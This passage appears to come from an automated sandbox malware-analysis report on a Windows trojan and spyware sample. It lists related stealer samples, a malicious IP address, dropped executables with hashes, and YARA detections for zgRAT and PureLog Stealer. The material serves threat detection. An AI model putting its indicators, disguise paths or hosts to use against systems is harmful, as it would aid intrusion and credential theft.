                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:9FwQYJSj4N.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:9342BE038F6FF329AAFFDC2626F8D145.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@18/326@0/1
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197, 23.218.208.109
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              TimeTypeDescription
                                                              04:02:31API Interceptor1004612x Sleep call for process: BSlvAOjamepaXWJMhY.exe modified
                                                              No context
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              MAXITEL-ASRUbPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                              • 89.23.100.233
                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                              • 89.23.100.42
                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                              • 89.23.100.42
                                                              7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                              • 89.23.100.233
                                                              T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                                              • 89.23.100.233
                                                              No context
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\Desktop\AtVzwBvZ.logDWTukBG9R7.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                CPNSQusnwC.exeGet hashmaliciousDCRatBrowse
                                                                  xoCq1tvPcm.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      eu6OEBpBCI.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        IYXE4Uz61k.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                          file.exeGet hashmaliciousAmadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, VidarBrowse
                                                                            gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                file.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with very long lines (852), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):852
                                                                                  Entropy (8bit):5.927964852103274
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:GA6c/oQGdEgOv+bTps/Va1qzAdqEBGH/UT:kQzvsTF1rdy/k
                                                                                  MD5:EEE9598E5786A00FABC8F16AEE669020
                                                                                  SHA1:0F8869572E6C1D24B62DEBC9903CE99986A9EDAE
                                                                                  SHA-256:313D8C70A4A54BCE3C60CF30ACEA94691B5AF7E0B4877A47463DDC594D460609
                                                                                  SHA-512:CFC79C865102D04990B39A95E83A73CBEC037E0B909C1F441DC747B4D092A3B6F7F7EF71EE064C6A53295192A02A51A04F8E0C2CF19767424F359C26C9443944
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:TDpYdcwS4BblIuBMynoq8EJqC8gTuVnDtxaGPNSfEQHHOTd1NzkgWa1O48Vf6chiXX1UT56kUJms7CctepG4uHqT6LLQ1xiltiu0bIhR2ALNxJR2gmAQWmyQriYItqshkA9YRlRVIyBt5dfw3TtPxSPGudJ3tYiMRonwK3k4VoIhlEUNCmOZ6dtSv3nxcYmtQybR0smAtz4IJrfqJ51HJIQy4UBQPwc6CYRwmCXT9NqGilIDY7oggekHinWfrVv7W7FvasEHihI5cJPTM82SH6ZiyJO8p2mncsulfXnp2h89WopYXDSscdzahh6QeFbp5edtZoxyVNZk7aLKd0lmj3L93UE7aWKxFSE1K68tPdXODOcGVwxodzFBTe0Ej0Y8DmfoWU9h12WGg65o27lojfTQNDiqF4JZFYLbtxuBxPxlc9eXjMMmOuZhSObTvTc7t6AHud4FMk0UsrxOiLH2rgLV8oIfVbPew02g8XmFRHZo3FzlaNvkLjPMvpIGUZtvUWh1zRPKjBljHhc3zhEIqpSNkpuTOgv2YnTgi7vJ7kBK8pEONPRwUkFoEUQJg66CPsLdN5V1v5LGoHO5lgF9P8hxipbOqmmAo84PelAR4ZAZZ9A6FVi917xRKX5idHLJSLbqN9b9fxFz7IYjofJUDmJrKnEGqcywO1GOhUtF4ieD18TC9V3880FpBufj4UTD9SlGBKBUvDZfIFzMTCHUizyXvbMwyKLkPaDjWNAyTjN4akh55SP1N9fKdOVk8Pfl1zQsCP0GBSA9m46K3Q0g4TWP52GI1a0EDlClUz3qcIz48fijRKqrY9rhcAwJJrOlc65A1V0EXKDvebRZUh0r
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Common Files\BSlvAOjamepaXWJMhY.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with very long lines (634), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):634
                                                                                  Entropy (8bit):5.876892965863702
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:EBlmNqL9ExjZLPU9u9dhxHWSmpqYpEJCO3MHz3ZCewiPng4tdiR3S2:i989L89uPXHVwl2JxMHz38eo4tci2
                                                                                  MD5:16EEB0481C5CCF7FEA7C08A4C35DD42D
                                                                                  SHA1:4DAEDB7A66B40C601A80A78AEDB549A40F71E69A
                                                                                  SHA-256:9B12B0B3ED33380139C99B46DD38E65216B88B854990660C683762AACB075E86
                                                                                  SHA-512:451DA5C919C22B2F7BAA9D97E8F1CB0677D915A9CB97A54129CF806F9E6A6F9D637997E607C5E72608BC34A78B523F54D3A61CBEFEB524B84F61036CE2286D23
                                                                                  Malicious:false
                                                                                  Preview:zjx4mtX86arqrU5JpiOFdRh7UxumxrgiezM67abNFBaMBSm4v3wMMAJiC0jz9vKO4JM1H8MPHA9c1U6BKz145TVdqo4G0lNU0LR1GuwwqhFLAqqr4hoJ4QTlysLdDFYfxplpDE4aDENXNJd97MMT7Eak2qCYjSslIjYVFBozmOFzC5XpOLg13FisPAxWCg0uVmPouI45iWqs8kh6TXJXw1rDBqFEORxGXVeaqt4GRkShYztpc0DoWc7d5LmECzrRikUnGHQkdDGLjJoM6alXOJu5XAfeG0Eb3B8yeGiVjcLTWw4vgaHlOTCZ0ZPFmvdm9pSiL0r01Qxv8bilGt8qscMj8j8E1dty9iTqeVkqsRt8gRbZ1n82xx4gcsjl2m8Yh9wZH2HuJR7bsODqHjNNe0ALoxOvv8xFSVagfBR8gOsfzcxNp3eSZv3q8kvTnW8Ld1JWxgLFROqQHfWL9AF2dfqgcui4P8VKPhB7SbaJrYBKEnidNkUnQFr8Lm4D8QzT3gAkdY2ik6LFdfcyLErpnr3K0CwqgWKaisRhn89zrwDU4mfpKG13jJpLn0ubmMCNwugvO4LNF281ojPNhGfZeQ1ZCF4xOiMetziJGtbP5oyrLxhEkg3gqmtf3H
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):131
                                                                                  Entropy (8bit):5.618938413877231
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kvvrlo2F1cIvNxiHB0AV7vvEbxPwcoVgzcEjOm9ZupUTAkPr:kvzl5KYW0A56xBoVhiupUz
                                                                                  MD5:36E9A833398AE244D1744CBEF4130F1F
                                                                                  SHA1:D10D05FA20FE9EC6BD8C63D14C3FFB862FF7465D
                                                                                  SHA-256:C4CC092BC1A29EEBBB6ECE295920C819559F77242D6AAAF0FAF456F429345DF1
                                                                                  SHA-512:0FF08577BFE78A4DD07109A0F0E9317324D4458B8EB03B3990BF7B1A42E79676EDDA1ABD4355490A6481BD1D37CBA909F41F1998DF0E42B882E554A452598586
                                                                                  Malicious:false
                                                                                  Preview:zAGHxoQezbJNOi0MsoqxHGCP9ASPgqSBqqrDeYF2aH3Du3ekKLQ19rAt80IxVB7JJHhi0wsTjxW9M9fGgsEVZaC9q8FnQSgZKt3mV6tXd6SLUAg8UCRm6mutFh11rEDQR7z
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):10393088
                                                                                  Entropy (8bit):3.7593823756442295
                                                                                  Encrypted:false
                                                                                  SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                                                  MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                                                  SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                                                  SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                                                  SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ApplicationFrameHost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1698
                                                                                  Entropy (8bit):5.367720686892084
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                                                  MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                                                  SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                                                  SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                                                  SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5712781801655107
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
